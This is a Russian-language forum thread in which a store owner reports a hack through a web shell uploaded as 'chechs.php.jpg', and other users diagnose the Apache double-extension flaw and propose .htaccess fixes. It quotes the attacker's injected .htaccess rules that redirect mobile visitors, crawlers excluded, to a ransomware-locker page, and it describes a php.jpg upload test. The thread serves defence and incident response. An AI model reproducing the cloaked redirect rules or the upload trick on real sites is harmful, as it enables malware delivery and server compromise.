Взлом магазина

[airtm]

Здравствуйте, сегодня обнаружил что магазин взломан, в футер был вставлен код google adsence)) Вроде ничего страшного, но сам факт неприятен.

Особо в логах не разбирался но хронология событий была примерно такая.

1. Был зарегистрирован пользователь
2. Был загружен файл через аплоадер картинок
3. Файл этот chechs.php.jpg естественно это не картинка, а скрипт, целый набор хакера с копирайтом iTSecTeam.com.
4. Далее через него было загружено еще пара файлов 360.php и sec.php (зачем нужен этот файл, не выяснил, при обнаружении он был уже пустой, но по моему он обращался в бд, или перехватывал пароли)
5. Далее был получен пароль администратора от админки.
6. Далее было несколько просмотров админки, статистики. Возможно был сделан дамп бд через
7. Через 2 дня опять был заход в админку и через редактор был изменен footer.html поставлен рекламный код.

Заходы был с одинакового филиппинского IP 125.60.229.55

Я все подчистил, но повторить тоже самое труда не составляет, весь взлом занял 9 минут судя по логам.
Отключить загрузку файлов пользователями я не могу, так как пользователи могут выставлять свой товар.

Кто что посоветует? Какое обновление безопасности поможет? Это то? )

Версия магазина старая 3,6 наверно.

[gdreamer]

Самое простое решение наверно обновиться до актуальной версии или смотреть все логи и углубляться в проблему.

Отключить загрузку файлов пользователями я не могу, так как пользователи могут выставлять свой товар.

Маска на типы загружаемых файлов не ставится?

[airtm]

Обновление безопасности не помогло, я все равно могу загружать файлы типа file.php.jpg

Тут углубляться особо некуда. Проблема в возможности загрузки таких файлов.
Просто так обновиться не получится, так как магазин сильно модифицирован в пользовательской части. Переносить это все на новую версию было бы неоправданно затратно.
А по поводу маски на типы файлов, я примерно представляю что это, но я далеко не программист и как что сделать не в курсе, поэтому и пришел сюда спросить)

[airtm]

Кто скажет в каком файле настраивается маска типов файлов и как там запретить загрузку файлов php.jpg?

[Skylink]

В четвертой версии настраивается в Настройки Товары Цифровые товары

[Aleksey]

Думаю, дело не в расширении файла, а в том, каким образом интерпретатор PHP выполнил код из этого jpg-файла. Предположу, что имя файла могло быть и просто chechs.jpg. Сейчас локально проверил - include jpg-файла с php-кодом прекрасно работает с настройками Apache по умолчанию.

Вот нашел кое-что - .

Было бы неплохо посмотреть логи сервера...

[airtm]

Прикрепляю архив с логами, относящиеся только к действиям взломщика.
А также тот самый скрипт и измененные в этот день файлы.

vzl.zip


ps. Дело происходит на обычном хостинге (masterhost) соответственно доступ к настройке апача ограничен.

[Aleksey]

Попробуйте вот что.

Создайте текстовый файл и впишите в него код:

PHP код:

<?php
phpinfo();
?>

Переименуйте файл в img.php.jpg.
Залейте его в папку images.
В адресной строке напишите http://site.ru/images/img.php.jpg и перейдите по этой ссылке.
Еще попробуйте такую ссылку http://site.ru/images/img.php.jpg?do=test.

По идее, в обоих случаях должна вывалиться ошибка, что изображение не может быть показано...


Еще в логах фигурируют файлы reviews.php и user_wishlist.php. С ними все в порядке?

[airtm]

reviews.php и user_wishlist.php не были изменены.
info.php.jpg - обрабатывается как php файл. Понимаю дело в хосте и настройках апача? Через htaccess это можно как то закрыть?
Попробовал проделать тоже самое на другом своем сервере, там этот фокус не проходит.

[airtm]

Попробовал сделать тоже самое на этом же хосте, но на другом домене с другой системой управления. Там файл не обрабатывается. Значит дело не в глобальных настройках хоста, а именно в настройках для магазина.

Содержание htaccess Может здесь что не так?

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . friendly_url.php [L]
</IfModule>
Action php-script /cgi-bin/php
AddHandler php-script .php

# cgi-bin protection from .masterhost
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]

[Aleksey]

Создайте в папке images файл .htaccess с содержимым:
php_flag engine off
и повторите вышеописанный трюк.

[VST]

Дайте в ЛС адрес сайта.

[airtm]

Попробовал
Выдает 500 Internal Server Error
Но теперь и просто картинки товаров из этой папки не грузятся.

[airtm]

VST скинул в личку.

Пока тут ковырялся нашел еще один эпизод взлома.
На этот раз дело было 11 мая. Был изменен .htaccess

Для тех кто не в курсе - это стандартный развод для тех кто смотрит сайт с телефона, ему предлагают загрузить локер требующий деньги под видом обновления браузера.
#sory
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamesp y|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|o oyyo|pagebull|scooter|w3c_validator|jigsaw|webalta |yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo |yandexmedia|yandexblogs|yandexaddurl|yandexfavico ns|yandexdirect|yandexmetrika|yandexcatalog|yandex news|yandeximageresizer) [NC]
RewriteRule (.*) [L,R=302]

Я бы подумал что у меня как то увели пароль от FTP или SSH но на этом же хосте в соседних папках находятся другие, куда более посещаемые сайты, но они не были тронуты. Так что тут скорее всего сломали похожим способом или еще что то нашли.

[Aleksey]

Нагуглил пару способов проверки файлов перед загрузкой:
1. Перекодировка всех изображений, чтобы избавиться от возможного php-кода в конце файла.
2. Поиск подстроки "<?php" в загружаемом файле.

[airtm]

Способы хороши, но в таком случае я так понимаю это не только проблема моего магазина, а всего движка. Если это с движком не все в порядке, ну тогда может выпустить какой то официальный патч, потому как проблема то довольно серьезная.

[VST]

Если это с движком не все в порядке, ну тогда может выпустить какой то официальный патч, потому как проблема то довольно серьезная.

Именно поэтому для точной постановки диагноза и нужно детальное обследование "пациента". Данные лучше официально через Запрос в Поддержку Новый запрос

[airtm]

Отправил в поддержку.
У кого то еще есть работающие магазины, можете проверить у себя тоже самое?

[Aleksey]

Где-то в сети нашел, что Apache отбрасывает неизвестное расширение и переходит к предыдущему. В данном случае получается, что Apache почему-то не известно расширение jpg, которое он отбрасывает, и вместо chechs.php.jpg получается chechs.php, который благополучно выполняется. Хотя странно, что правильные jpg-файлы нормально открываются в браузере...

Для решения проблемы нужно:
1. Жестко прописать допустимые расширения файлов для загрузки на сервер.
2. Для этих-же расширений в настройках Apache прописать типы.

Если доступа к настройкам Apache нет, то в .htaccess, лежащий в корне сайта, добавить примерно следующее содержимое:

Код:

AddHandler image/gif .gif .GIF
AddHandler image/jpeg .jpeg .jpg .jpe .JPG
AddHandler image/tiff .tiff .tif

[airtm]

Aleksey спасибо, это действенный метод. Ну по крайней мере от точно такой же атаки)